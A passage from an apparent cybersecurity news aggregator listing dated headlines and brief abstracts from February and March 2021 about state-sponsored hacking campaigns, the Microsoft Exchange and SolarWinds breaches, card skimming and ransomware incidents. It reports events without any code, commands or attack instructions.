Victimizing at least nine organizations across Africa, Europe, Mexico, and the U.S in the past two weeks, the REvil gang is probably showing off its Gootloader malware loader.Cyware Alerts - Hacker News
March 18, 2021
Chinese nation state hackers linked to Finnish Parliament hack Full Text
Abstract
Chinese nation-state hackers have been linked to an attack on the Parliament of Finland that took place last year and led to the compromise of some parliament email accounts.BleepingComputer
March 18, 2021
Hackers can get access to your SMSes for just few dollars Full Text
Abstract
Text-messaging management services are now being misused for as little as $16 to covertly redirect text messages from users to hackers, giving cybercriminals access to two-factor codes/login SMSes.The Times Of India
March 17, 2021
China-linked hackers target telcos to steal 5G secrets Full Text
Abstract
Chinese APT groups are targeting telecom companies in cyberespionage campaigns collectively tracked as Operation Diànxùn, to steal 5G secrets. Chinese-language threat actors are targeting telecom companies, as part of a cyber espionage campaign...Security Affairs
March 17, 2021
State-sponsored Threat Groups Target Telcos, Steal 5G Secrets Full Text
Abstract
Researchers say China-linked APTs lure victims with bogus Huawei career pages in what they dub ‘Operation Diànxùn’.Threatpost
March 17, 2021
[Webinar] Oy Vey, We Hired a Large, Hairy Hacker… Full Text
Abstract
It's not every day that one of the best-known independent cybersecurity individuals joins a cybersecurity company. The two are generally on opposite sides of the coin, with little crossover. After all, they're usually concerned with different parts of the cybersecurity puzzle – one providing platforms and tools to defend organizations, the other keeping them accountable and looking for blind spots in even the best security tools. That seems to be changing, however, with a recent appointment. Cynet, an Autonomous XDR provider that recently closed a Series C funding round worth $40 million, announced that it has hired Chris Roberts as their Chief Security Strategist. Roberts is world-renowned in counter-threat intelligence, as well as in vulnerability and threat research fields, thanks to decades of experience. As part of his efforts at Cynet, Roberts will be focusing his work on helping empower and connect security professionals from organizations outside of the Fortune 200The Hacker News
March 17, 2021
Threat actors thriving on the fear and uncertainty of remote workforces Full Text
Abstract
The WFH reality resulted in an unprecedented change for organizations as they fought to defend exponentially greater attack surfaces from cybercriminals armed with powerful cloud-based tools.Help Net Security
March 17, 2021
Chinese Threat Actors Target Global 5G Operators Full Text
Abstract
Spoofed Huawei phishing page lures employeesInfosecurity Magazine
March 17, 2021
Researcher adds his fake package to Microsoft Azure SDK releases list Full Text
Abstract
A security researcher was able to add a counterfeit test package to the official list of Microsoft Azure SDK latest releases. The simple trick if abused by an attacker can give off the impression that their malicious package is part of the Azure SDK suite.BleepingComputer
March 17, 2021
SolarWinds hackers stole some of Mimecast source code Full Text
Abstract
Cybersecurity firm Mimecast confirmed that SolarWinds hackers who breached its network stole some of its source code. Back in December, the SolarWinds supply chain attack made the headlines when a Russian cyber espionage group tampered with updates...Security Affairs
March 17, 2021
Researcher adds their package to Microsoft Azure SDK releases list Full Text
Abstract
A security researcher was able to add their own test package to the official list of Microsoft Azure SDK latest releases. The simple trick if abused by an attacker can give off the impression that their malicious package is part of the Azure SDK suite.BleepingComputer
March 16, 2021
Magecart hackers hide captured credit card data in JPG file Full Text
Abstract
Crooks devised a new method to hide credit card data siphoned from compromised e-stores, experts observed hackers hiding data in JPG files. Cybercriminals have devised a new method to hide credit card data siphoned from compromised online stores,...Security Affairs
March 16, 2021
Magecart Attackers Save Stolen Credit-Card Data in .JPG File Full Text
Abstract
Researchers from Sucuri discovered the tactic, which creatively hides malicious activity until the info can be retrieved, during an investigation into a compromised Magento 2 e-commerce site.Threatpost
March 16, 2021
Hackers hide credit card data from compromised stores in JPG file Full Text
Abstract
Hackers have come up with a sneaky method to steal payment card data from compromised online stores that reduces the suspicious traffic footprint and helps them evade detection.BleepingComputer
March 15, 2021
Hackers hit 32 Indian firms via Microsoft email servers Full Text
Abstract
The hardest-hit sectors in India are finance and banking institutions (28%), government\military organizations (16%), manufacturing (12.5%), insurance\legal (9.5%), and others (34%), according to CPR.The Times Of India
March 12, 2021
This Financially-Motivated Actor has Targeted Countless Industrial Organizations Full Text
Abstract
Security analysts uncovered an attack campaign targeting oil and gas supply chain industries in Europe, the Middle East, Asia Pacific, and North America using spearphishing techniques.Cyware Alerts - Hacker News
March 12, 2021
Researchers hacked Indian govt sites via exposed git and env files Full Text
Abstract
Researchers have now disclosed more information on how they were able to breach multiple websites of the Indian government. The full findings disclosed today shed light on the routes leveraged by the researchers, including finding exposed .git directories and .env files on some of these systems.BleepingComputer
March 11, 2021
Threat actors bypassing shoddy patching, targeting network gateways Full Text
Abstract
Patch bypasses and network pivot vulnerabilities are becoming more common tools in the box of threat actors, according to new research.SCMagazine
March 11, 2021
Hackers stole data from Norway parliament exploiting Microsoft Exchange flaws Full Text
Abstract
Norway parliament, the Storting, has suffered a new cyberattack, hackers stole data by exploiting recently disclosed Microsoft Exchange vulnerabilities. Norway 's parliament, the Storting, was hit by a new cyberattack, threat actors stole data exploiting...Security Affairs
March 10, 2021
White hat hackers gained access more than 150,000 surveillance cameras Full Text
Abstract
A group of hackers claimed to have compromised more than 150,000 surveillance cameras at banks, jails, schools, and prominent companies like Tesla and Equinox. A group of US hackers claimed to have gained access to footage from 150,000 security cameras...Security Affairs
March 10, 2021
Malicious Actors Target Crypto Wallets of Coinbase Users in New… Full Text
Abstract
Cybercriminals are targeting Coinbase platform users with phishing campaings in an attempt to steal their account credentials and drain their cryptocurrency wallets, Bitdefender reported.Bit Defender
March 10, 2021
Cyberattackers Exploiting Critical WordPress Plugin Bug Full Text
Abstract
The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.Threatpost
March 10, 2021
SolarWinds Unlikely to Be an Isolated Event as Attackers Become More Sophisticated Full Text
Abstract
Pandemic has allowed malicious actors to industrializeInfosecurity Magazine
March 10, 2021
More hacking groups join Microsoft Exchange attack frenzy Full Text
Abstract
More state-sponsored hacking groups have joined the ongoing attacks targeting tens of thousands of on-premises Exchange servers impacted by severe vulnerabilities tracked as ProxyLogon.BleepingComputer
March 9, 2021
Chinese linked to two attacks on internet-facing SolarWinds server Full Text
Abstract
Researchers Monday suspected the Chinese espionage group Spiral of two intrusions in 2020 to a SolarWinds Orion server that were linked to each other but not to the infamous SolarWinds attack attributed to Russia.SCMagazine
March 09, 2021
Hackers access surveillance cameras at Tesla, Cloudflare, banks, more Full Text
Abstract
Hackers gained access to live surveillance cameras installed at Tesla, Equinox, healthcare clinics, jails, and banks, including the Bank of Utah.BleepingComputer
March 09, 2021
Security bug hunters focus on misconfigured services, earn big rewards Full Text
Abstract
An overview of the hacking activity on the HackerOne vulnerability coordination and bug bounty platform shows that misconfiguration of cloud resources is quickly becoming a hot target for ethical hackers.BleepingComputer
March 09, 2021
SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers Full Text
Abstract
A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group. In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral. Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security , both of whom described Supernova as a .NET web shell implemented by modifying an "app_web_logoimagehandler.ashx.b6031896.dll" module of the SolarWinds Orion application. The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead bThe Hacker News
March 8, 2021
Hackers Target Texas University Full Text
Abstract
Malicious intrusion causes network outage at the University of Texas at El PasoInfosecurity Magazine
March 08, 2021
Iranian Hackers Using Remote Utilities Software to Spy On Its Targets Full Text
Abstract
Hackers with suspected ties to Iran are actively targeting academia, government agencies, and tourism entities in the Middle East and neighboring regions as part of an espionage campaign aimed at data theft. Dubbed "Earth Vetala" by Trend Micro, the latest finding expands on previous research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies by exploiting ScreenConnect remote management tool. The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater , an Iranian hacker group known for its offensives primarily against Middle Eastern nations. Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control (C2) server to exeThe Hacker News
March 8, 2021
Hackers compromised Microsoft Exchange servers at the EU Banking Regulator EBA Full Text
Abstract
The European Banking Authority (EBA) disclosed a cyberattack that resulted in the hack of its Microsoft Exchange email system. The European Banking Authority announced that it was the victim of a cyber attack against its email system that exploited...Security Affairs
March 8, 2021
The launch of Williams new FW43B car ruined by hackers Full Text
Abstract
The presentation of Williams's new Formula One car was ruined by hackers that forced the team to abandon the launch through an augmented reality app. The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch...Security Affairs
March 7, 2021
Chinese hackers allegedly hit thousands of organizations using Microsoft Exchange Full Text
Abstract
Thousands of organizations may have been victims of cyberattacks on Microsoft Exchange servers conducted by China-linked threat actors since January. At least tens of thousands of Microsoft customers may have been hacked by allegedly China-linked...Security Affairs
March 5, 2021
Chinese hackers might have targeted Indian Railways infrastructure Full Text
Abstract
Besides 10 organizations in the Indian power sector and two ports, Chinese state-sponsored hackers might also have targeted Indian Railways infrastructure, an expert with cyber intelligence company Recorded Future said on Thursday.The Times Of India
March 5, 2021
Hackers Target Russian Cybercrime Forums Full Text
Abstract
Maza becomes latest Russian cybercrime forum to be hackedInfosecurity Magazine
March 5, 2021
Multiple Cyberspy Groups Target Microsoft Exchange Servers via Zero-Day Flaws Full Text
Abstract
ESET researchers revealed that, while most of the targets are located in the United States, attacks against servers in Europe, Asia, and the Middle East have been identified as well.Security Week
March 04, 2021
FireEye finds evidence Chinese hackers exploited Microsoft email app flaw since January Full Text
Abstract
Cybersecurity group FireEye on Thursday night announced it had found evidence that hackers had exploited a flaw in a popular Microsoft email application since as early as January to target groups across a variety of sectors.The Hill
March 4, 2021
Cyberattackers Target Top Russian Cybercrime Forums Full Text
Abstract
Elite Russian forums for cybercriminals have been hacked in a string of breaches, leaving hackers edgy and worried about law enforcement.Threatpost
March 4, 2021
North Korea and Cybercrime - A Malicious Combination Full Text
Abstract
It can be unarguably stated that North Korea and cybercrime go hand in hand. The nation is highly focused on reinforcing its cyber capabilities, by all means necessary, and creating more than just a nuisance.Cyware Alerts - Hacker News
March 04, 2021
Researcher bitsquats Microsoft’s windows.com to steal traffic Full Text
Abstract
A researcher was able to bitsquat Microsoft's windows.com domain by cybersquatting variations of windows.com. Adversaries can abuse this tactic to conduct automated attacks or collect data due to the nature of bit flipping.BleepingComputer
March 3, 2021
Hackers, nation-states, target US black community to commit fraud, sow division Full Text
Abstract
African Americans are more highly impacted by fraud campaigns compared to other racial and ethnic groups, as disparities in financial literacy and wealth act as barriers to recovery from any resulting financial loss.SCMagazine
March 03, 2021
Hackers share methods to bypass 3D Secure for payment cards Full Text
Abstract
Cybercriminals are constantly exploring and documenting new ways to go around the 3D Secure (3DS) protocol used for authorizing online card transactions.BleepingComputer
March 03, 2021
State hackers rush to exploit unpatched Microsoft Exchange servers Full Text
Abstract
Multiple state-sponsored hacking groups are actively exploiting critical Exchange bugs Microsoft patched Tuesday via emergency out-of-band security updates.BleepingComputer
March 03, 2021
Hackers Now Hiding ObliqueRAT Payload in Images to Evade Detection Full Text
Abstract
Cybercriminals are now deploying remote access Trojans (RATs) under the guise of seemingly innocuous images hosted on infected websites, once again highlighting how threat actors quickly change tactics when their attack methods are discovered and exposed publicly. New research released by Cisco Talos reveals a new malware campaign targeting organizations in South Asia that utilize malicious Microsoft Office documents forged with macros to spread a RAT that goes by the name of ObliqueRAT . First documented in February 2020 , the malware has been linked to a threat actor tracked as Transparent Tribe (aka Operation C-Major, Mythic Leopard, or APT36), a highly prolific group allegedly of Pakistani origin known for its attacks against human rights activists in the country as well as military and government personnel in India. While the ObliqueRAT modus operandi previously overlapped with another Transparent Tribe campaign in December 2019 to disseminate CrimsonRAT, the new wave ofThe Hacker News
March 3, 2021
Threat Actor HAFNIUM Found Targeting Exchange Servers with Zero-Day Exploits Full Text
Abstract
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics, and procedures.Microsoft
March 2, 2021
Medal of Honor Holders’ Identities Stolen Full Text
Abstract
Hacker stole heroes’ identities and used them to buy goods on American military exchangesInfosecurity Magazine
March 2, 2021
Chinese hackers target Indian vaccine makers SII, Bharat Biotech, says security firm Full Text
Abstract
A Chinese state-backed hacking group has in recent weeks targeted the IT systems of two Indian vaccine makers whose coronavirus shots are being used in the country, Cyfirma told Reuters.Reuters
March 2, 2021
How Apple’s locked down security gives extra protection to the best hackers Full Text
Abstract
When the most advanced hackers do succeed in breaking in, something strange happens: Apple’s extraordinary defenses end up protecting the attackers themselves instead of keeping them out.Technology Review
March 1, 2021
China’s new cyber tactic: targeting critical infrastructure Full Text
Abstract
Amid tensions along their border, the new RedEcho group is breaching power infrastructure in India.SCMagazine
March 1, 2021
Chinese Hacker Group Targets Indian Power Sector & critical infrastructure Amid Border Tensions Full Text
Abstract
Recently, a Chinese state-sponsored hacker group, RedEcho has targeted the Indian power sector and critical infrastructure amid border tensions in an effort...Cyber Security News
March 1, 2021
A new tactic for Chinese cyber actors: threatening critical infrastructure Full Text
Abstract
Amid tensions along their border, the new RedEcho group is breaching power infrastructure in India.SCMagazine
March 1, 2021
10 Indian Power Generation and Transmission Entities Targeted by Chinese Hackers Amid Geopolitical Tensions Full Text
Abstract
A new study shows that as the standoff continued in the Himalayas between India and China, Chinese malware was flowing into the control systems that manage electric supply across India.New York Times
March 01, 2021
Chinese Hackers Targeted India’s Power Grid Amid Geopolitical Tensions Full Text
Abstract
Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups. The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector. "10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure," Recorded Future said in a report published yesterday. "Other targets identified included 2 Indian seaports." Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based PowerThe Hacker News
February 27, 2021
Hotarus Corp gang hacked Ecuador’s Ministry of Finance and Banco Pichincha Full Text
Abstract
'Hotarus Corp' Ransomware operators hacked Ecuador's largest private bank, Banco Pichincha, and the country's Ministry of Finance. A cybercrime group called 'Hotarus Corp' has breached the Ecuador's largest private bank, Banco Pichincha, and the local...Security Affairs
February 26, 2021
North Korean Hackers Targeting Defense Firms with ThreatNeedle Malware Full Text
Abstract
A prolific North Korean state-sponsored hacking group has been tied to a new ongoing espionage campaign aimed at exfiltrating sensitive information from organizations in the defense industry. Attributing the attacks with high confidence to the Lazarus Group , the new findings from Kaspersky signal an expansion of the APT actor's tactics by going beyond the usual gamut of financially-motivated crimes to fund the cash-strapped regime. This broadening of its strategic interests happened in early 2020 by leveraging a tool called ThreatNeedle , researchers Vyacheslav Kopeytsev and Seongsu Park said in a Thursday write-up. At a high level, the campaign leverages a multi-step approach that begins with a carefully crafted spear-phishing attack leading eventually to the attackers gaining remote control over the devices. ThreatNeedle is delivered to targets via COVID-themed emails with malicious Microsoft Word attachments as initial infection vectors that, when opened, run a macro coThe Hacker News
February 26, 2021
Hackers are selling access to Biochemical systems at Oxford University Lab Full Text
Abstract
Hackers have broken into the biochemical systems of an Oxford University lab where researchers are working on the study of Covid-19. Hackers compromised the systems at one of the most advanced biology labs at the Oxford University that is involved...Security Affairs
February 26, 2021
Chinese Hackers Target Tibetans with Malicious Firefox Extension Full Text
Abstract
FriarFox allows intruders to monitor emails and browser dataInfosecurity Magazine
February 26, 2021
These four new hacking groups are targeting critical infrastructure, warns security company Full Text
Abstract
According to cybersecurity researchers at Dragos, four new hacking groups, dubbed Stibnite, Talonite, Kamacite, and Vanadinite, targeting industrial systems have been detected over the past year.ZDNet
February 26, 2021
China-linked TA413 group target Tibetan organizations Full Text
Abstract
The Chinese hacking group, tracked as TA413, used a malicious Firefox add-on in a cyberespionage campaign aimed at Tibetans. China-linked cyberespionage group TA413 targeted Tibetan organizations across the world using a malicious Firefox add-on,...Security Affairs
February 25, 2021
Hackers Abusing Google Apps Script Full Text
Abstract
Attackers are exploiting the Google App Script domain—script.google.com—to evade Content Security Policy (CSP) controls and malware scan engines.Cyware Alerts - Hacker News
February 25, 2021
North Korean hackers target defense industry with custom malware Full Text
Abstract
A North Korean-backed hacking group has targeted the defense industry with custom backdoor malware dubbed ThreatNeedle since early 2020 with the end goal of collecting highly sensitive information.BleepingComputer
February 25, 2021
Russian Hackers Targeted Ukraine Authorities With Supply-Chain Malware Attack Full Text
Abstract
Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities. "The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities," the National Security and Defense Council of Ukraine (NSDC) said in a statement published on Wednesday. The NSDC's National Coordination Center for Cybersecurity (NCCC) termed it a supply chain attack aimed at the System of Electronic Interaction of Executive Bodies (SEI EB), which is used to distribute documents to officials. Calling it a work of threat actors with ties to Russia, the NSDC said the malicious documents came embedded with a macro that, when opened, stealthily downloaded malicious code to control the compromised system remotely. "The mThe Hacker News
February 24, 2021
Hackers have eye on 6 Bangladeshi organisations Full Text
Abstract
Kasablanca, a hacker group, has targeted cyberattacks on at least six well-known Bangladeshi financial and government organizations, says the e-Government Computer Incident Response Team (e-Gov CIRT).Dhaka Tribune
February 24, 2021
Russian hackers linked to attack targeting Ukrainian government Full Text
Abstract
The National Security and Defense Council of Ukraine (NSDC) has linked Russian-backed hackers to attempts to compromise state agencies after breaching the government's document management system.BleepingComputer
February 24, 2021
LazyScripter hackers target airlines with remote access trojans Full Text
Abstract
Security researchers analyzing multiple sets of malicious emails believe they uncovered activity belonging to a previously unidentified actor that fits the description of an advanced persistent threat (APT).BleepingComputer
February 24, 2021
New hacker group targets airlines, refugees with well worn tools Full Text
Abstract
The group used job and IATA related lures, as well as fake updates; immigration, tourism and visa related documents; and COVID-19 information to infect victims.SCMagazine
February 23, 2021
Twitter removes accounts of Russian government-backed actors Full Text
Abstract
Twitter has removed dozens of accounts connected to Russian government-backed actors disseminating disinformation and targeting the European Union, the United States, and the NATO alliance.BleepingComputer
February 23, 2021
Hackers Can Bypass Mastercard PIN by Using them as a Visa Card Full Text
Abstract
The cybersecurity researchers have recently detected a threat attack that could easily enable the threat actors to trick a point of sale...Cyber Security News
February 22, 2021
Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks Full Text
Abstract
Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546 . The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang. But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms. According to Risky Business , some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel , the American Bureau of Shipping, law firmThe Hacker News
February 22, 2021
Chinese Hackers Hijacked NSA-Linked Hacking Tool: Report Full Text
Abstract
APT31, a Chinese-affiliated threat group, copied a Microsoft Windows exploit previously used by the Equation Group, said researchers.Threatpost
February 22, 2021
Chinese hackers used NSA exploit years before Shadow Brokers leak Full Text
Abstract
Chinese state hackers cloned and started using an NSA zero-day exploit almost three years before the Shadow Brokers hacker group publicly leaked it in April 2017.BleepingComputer
February 22, 2021
NSA Equation Group tool was used by Chinese hackers years before it was leaked online Full Text
Abstract
The Chinese APT group had access to an NSA Equation Group, NSA hacking tool and used it years before it was leaked online by Shadow Brokers group. Check Point Research team discovered that China-linked APT31 group (aka Zirconium.) used a tool dubbed...Security Affairs
February 22, 2021
An attacker was able to siphon audio feeds from multiple Clubhouse rooms Full Text
Abstract
An attacker demonstrated this week that Clubhouse chats are not secure, he was able to siphon audio feeds from “multiple rooms” into its own website While the popularity of the audio chatroom app Clubhouse continues to increase experts are questioning...Security Affairs
February 22, 2021
Chinese Shadow Brokers Hacking Group Copied Windows Zero-Day Exploit Belonging to NSA’s Equation Group Full Text
Abstract
Chinese threat actors "cloned" and used a Windows zero-day exploit stolen from the NSA's Equation Group for years before the privilege escalation flaw was patched, researchers say.ZDNet
February 22, 2021
Chinese Hackers Had Access to a U.S. Hacking Tool Years Before It Was Leaked Online Full Text
Abstract
On August 13, 2016, a hacking unit calling itself " The Shadow Brokers " announced that it had stolen malware tools and exploits used by the Equation Group, a sophisticated threat actor believed to be affiliated to the Tailored Access Operations (TAO) unit of the U.S. National Security Agency (NSA). Although the group has since signed off following the unprecedented disclosures, new "conclusive" evidence unearthed by Check Point Research shows that this was not an isolated incident. The previously undocumented cyber-theft took place more than two years before the Shadow Brokers episode, the American-Israeli cybersecurity company said in an exhaustive report published today, resulting in U.S.-developed cyber tools reaching the hands of a Chinese advanced persistent threat which then repurposed them in order to attack U.S. targets. "The caught-in-the-wild exploit of CVE-2017-0005, a zero-day attributed by Microsoft to the Chinese APT31 (aka Zirconium), isThe Hacker News
February 21, 2021
Experts warn of threat actors abusing Google Alerts to deliver unwanted programs Full Text
Abstract
Experts warn of threat actors using Google Alerts to promote a fake Adobe Flash Player updater that delivers unwanted programs. Experts from BleepingComputer are warning of threat actors that are using Google Alerts to promote a fake Adobe Flash Player...Security Affairs
February 21, 2021
RDP Attackers Have Made Themselves at Home Full Text
Abstract
We all know that the attack surface has expanded because of the sudden shift to work from home, and now, this has given a boost to Remote Desktop Protocol (RDP) attacks.Cyware Alerts - Hacker News
February 21, 2021
Bug bounty hacker earned $5,000 reporting a Stored XSS flaw in iCloud.com Full Text
Abstract
A white hat hacker has earned a $5,000 reward from Apple for reporting a stored cross-site scripting (XSS) vulnerability on iCloud.com. The bug bounty hunter Vishal Bharad has earned a $5,000 reward from Apple for reporting a stored cross-site scripting...Security Affairs
February 19, 2021
SolarWinds Attackers Breached 100+ Private Firms Full Text
Abstract
White House briefing reveals extent of attack on tech industryInfosecurity Magazine
February 19, 2021
Hackers steal credit card data abusing Google’s Apps Script Full Text
Abstract
Hackers abuse Google Apps Script to steal credit cards, bypass CSP Attackers are abusing Google's Apps Script business application development platform to steal payment card information from e-stores. Sansec researchers reported that threat...Security Affairs
February 18, 2021
SolarWinds Hackers Stole Some Source Code for Microsoft Azure, Exchange, Intune Full Text
Abstract
Microsoft, on Thursday, said it concluded its probe into the SolarWinds hack, finding that the attackers stole some source code but confirmed there's no evidence that they abused its internal systems to target other companies or gained access to production services or customer data. The disclosure builds upon an earlier update on December 31, 2020, that uncovered a compromise of its own network to view source code related to its products and services. "We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker had previously disclosed. "The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated.". Now according to the company, besides viewing few individual files by searching throThe Hacker News
February 18, 2021
Microsoft: SolarWinds hackers downloaded some Azure, Exchange source code Full Text
Abstract
Microsoft announced today that the SolarWinds hackers could gain access to source code for a limited amount of components used by Azure, Intune, and Exchange.BleepingComputer
February 18, 2021
SolarWinds hackers had access to components used by Azure, Intune, and Exchange Full Text
Abstract
Microsoft announced that SolarWinds hackers could have had access to repositories containing some components used by Azure, Intune, and Exchange. Microsoft announced that the threat actors behind the SolarWinds supply chain attack could have had access...Security Affairs
February 18, 2021
Hackers abuse Google Apps Script to steal credit cards, bypass CSP Full Text
Abstract
Attackers are abusing Google's Apps Script business application development platform to steal credit card information submitted by customers of e-commerce websites while shopping online.BleepingComputer
February 18, 2021
Hackers target Myanmar government websites in coup protest Full Text
Abstract
Hackers attacked military-run government websites in Myanmar on Thursday (Feb 18) as a cyber war erupted after authorities shut down the Internet for a fourth straight night.Channel News Asia
February 18, 2021
Microsoft: SolarWinds hackers downloaded Azure, Exchange source code Full Text
Abstract
Microsoft announced today that the SolarWinds hackers could gain access to source code for a limited amount of components used by Azure, Intune, and Exchange.BleepingComputer
February 17, 2021
Hackers are Playing No Games: CD Projekt Edition Full Text
Abstract
CD Projekt Red, the Polish gaming firm, announced being hit by a ransomware attack affecting its network. The group responsible for the attack goes by the name of HelloKitty.Cyware Alerts - Hacker News
February 17, 2021
Russian Sandworm hackers only hit orgs with old Centreon software Full Text
Abstract
Centreon, the maker of the IT monitoring software exploited by Russian state hackers to infiltrate French companies' networks, said today that only organizations using obsolete software were compromised.BleepingComputer
February 17, 2021
Researchers Unmask Hackers Behind APOMacroSploit Malware Builder Full Text
Abstract
Cybersecurity researchers have disclosed a new kind of Office malware distributed as part of a malicious email campaign that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely. The tool — dubbed " APOMacroSploit " — is a macro exploit generator that allows the user to create an Excel document capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection. APOMacroSploit is believed to be the work of two French-based threat actors "Apocaliptique" and "Nitrix," who are estimated to have made at least $5000 in less than two months selling the product on HackForums.net. About 40 hackers in total are said to be behind the operation, utilizing 100 different email senders in a slew of attacks targeting users in more than 30 different countries. The attacks were spotted for the first time at the end of November 2020, accoThe Hacker News
February 16, 2021
Hacker claims to have stolen files from law firm tied to Trump: WSJ Full Text
Abstract
A hacker is claiming to have stolen files from prominent law firm Jones Day, The Wall Street Journal reported on Tuesday.The Hill
February 16, 2021
South Korea claims North Koreans hacked Pfizer for COVID-19 vaccine data Full Text
Abstract
The report comes after attempts late last year by suspected North Korean hackers to steal data from at least nine healthcare companies, such as Johnson & Johnson, Novavax and AstraZeneca.SCMagazine
February 16, 2021
Threat Actors Unite Against Healthcare Sector Full Text
Abstract
As if double extortion was not enough, the triple extortion tactic is here to be the next nightmare, especially for the healthcare sector.Cyware Alerts - Hacker News
February 16, 2021
North Korean hackers targeted Pfizer coronavirus vaccine: report Full Text
Abstract
North Korean hackers were recently involved in targeting and attempting to steal information on Pfizer’s COVID-19 vaccine, The Washington Post reported Tuesday.The Hill
February 16, 2021
North Korea ‘Tried to Hack’ Pfizer for Vaccine Info - South’s Spies: Reports Full Text
Abstract
North Korean hackers tried to break into the systems of Pfizer in a search for information on a COVID-19 vaccine and treatment technology, South Korea's spy agency said Tuesday, according to reports.Security Week
February 16, 2021
Why Threat Actors Continue to Rely on Cyber Fraud Full Text
Abstract
While 2020 is gone, cyber fraud problems will continue in 2021. Cybercriminals will focus on maximizing their profits, using a traditional cost-benefit analysis to decide on the best attack vector.Fortinet
February 16, 2021
Microsoft: 1000+ Hackers Worked on SolarWinds Campaign Full Text
Abstract
Russian-backed cyber-espionage operation is “largest” world has seenInfosecurity Magazine
February 15, 2021
Hackers Exploit IT Monitoring Tool Centreon to Target Several French Entities Full Text
Abstract
Russia-linked state-sponsored threat actor known as Sandworm has been linked to a three-year-long stealthy operation to hack targets by exploiting an IT monitoring tool called Centreon . The intrusion campaign — which breached "several French entities" — is said to have started in late 2017 and lasted until 2020, with the attacks particularly impacting web-hosting providers, said the French information security agency ANSSI in an advisory. "On compromised systems, ANSSI discovered the presence of a backdoor in the form of a webshell dropped on several Centreon servers exposed to the internet," the agency said on Monday. "This backdoor was identified as being the PAS webshell, version number 3.1.4. On the same servers, ANSSI found another backdoor identical to one described by ESET and named Exaramel." The Russian hacker group (also called APT28, TeleBots, Voodoo Bear, or Iron Viking) is said to be behind some of the most devastating cyberattacks in pThe Hacker News
February 15, 2021
France links Russian Sandworm hackers to hosting provider attacks Full Text
Abstract
The French national cyber-security agency has linked a series of attacks that resulted in the breach of multiple French IT providers over a span of four years to the Russian-backed Sandworm hacking group.BleepingComputer
February 15, 2021
Hackers Not Relinquishing Attacks on Medical Sector, Not Yet Full Text
Abstract
Healthcare organizations are still struggling to keep their patients’ confidential data out of the reach of hackers. Especially in the era of COVID-19.Cyware Alerts - Hacker News
February 14, 2021
Pro-India hackers use Android spyware to spy on Pakistani military Full Text
Abstract
This week a report has revealed details on the two spyware strains leveraged by state-sponsored threat actors during the India-Pakistan conflict. The malware strains named Hornbill and SunBird have been delivered as fake Android apps (APKs) by the Confucius advanced persistent threat group (APT), a state-sponsored operation.BleepingComputer
February 13, 2021
Windows Users Face Another Wave of Cyber Threats Full Text
Abstract
Threat actors continue to upgrade their attack arsenal. Now, researchers reported a cyberespionage campaign using the new LodaRAT to spy on Android and Windows users in Bangladesh.Cyware Alerts - Hacker News
February 13, 2021
Iranian MuddyWater Hacker Group Utilizing ScreenConnect for Nefarious Purposes Full Text
Abstract
An Iranian APT masquerading as the Ministry of Foreign Affairs of Kuwait and the UAE National Council is using a remote management tool called ConnectWise Control in a cyberespionage campaign.Cyware Alerts - Hacker News
February 12, 2021
Dark Web Forums Have Become a Picnic Spot for Hackers Full Text
Abstract
The dark web is proving to be a serious menace for organizations and the threats keep on piling up with the huge amount of data dumped on it on a regular basis.Cyware Alerts - Hacker News
February 12, 2021
Hackers Getting Used to Automated Tools to Target Webapps Full Text
Abstract
According to a recent report, cybercriminals are now actively adopting automation tools and bots to target web applications. Sometimes, bots would impersonate Google bots to evade a system's defensive mechanism.Cyware Alerts - Hacker News
February 12, 2021
Hackers Claim to Sell 40 Million User Records From Largest Commercial Bank in Ukraine Full Text
Abstract
The database is said to contain customers’ full names, birthdates, taxpayer identification number (TIN), birthplace, passport details, family status, car availability, education, phone number, etc.Cyber News
February 12, 2021
Food-delivery fraudsters deploy hacked accounts, stolen credit card info to skim from orders Full Text
Abstract
